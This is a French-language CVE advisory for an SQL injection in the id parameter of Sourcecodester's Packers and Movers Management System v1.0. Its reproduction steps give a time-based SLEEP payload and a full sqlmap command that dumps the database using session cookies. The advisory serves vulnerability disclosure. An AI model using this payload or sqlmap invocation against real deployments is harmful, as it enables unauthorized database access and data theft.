CVE-2024-48427
Description
Une vulnérabilité d'injection SQL dans Sourcecodester Packers and Movers Management System v1.0 permet aux utilisateurs authentifiés distants d'exécuter des commandes SQL arbitraires via le paramètre id dans /mpms/admin/?page=services/manage_service&id
Type de vulnérabilité
Injection SQL
Fournisseur du produit
Sourcecodester
Base de code du produit affecté :
https://www.sourcecodester.com/php/15360/packers-and-movers-management-system-phpoop-free-source-code.html - 1.0
Composant affecté :
Le paramètre id de Mise à jour des détails du service à /mpms/admin/?page=services/manage_service&id
Vecteurs d'attaque :
- Configurer l'application localement et se connecter au panneau d'administration en utilisant les identifiants par défaut fournis.
- Naviguer vers la page vulnérable : http://localhost/mpms/admin/?page=services/manage_service&id=2
- Injecter la charge utile SQL dans le paramètre id : http://localhost/mpms/admin/?page=services/manage_service&id=1' OR SLEEP(5)-- puNr
- Observer la réponse de l'application : La page devrait prendre sensiblement plus de temps (5 secondes) à charger si l'injection est réussie, confirmant que le paramètre id est vulnérable à l'injection SQL.
- Exécuter maintenant l'outil SQLMap pour extraire les détails de la base de données :
- sqlmap -u "http://localhost/mpms/admin/?page=services/manage_service&id=1" --cookie="phpMyAdmin=ju34bd3d8q0jdf6td4ntqscaqd;PHPSESSID=eopn8q1p8c1f5m1v5igjoir8k1;" --dbms mysql -p id --risk 3 --level 4 --dbs --dump
Références :
- https://owasp.org/www-community/attacks/SQL_Injection
- https://portswigger.net/web-security/sql-injection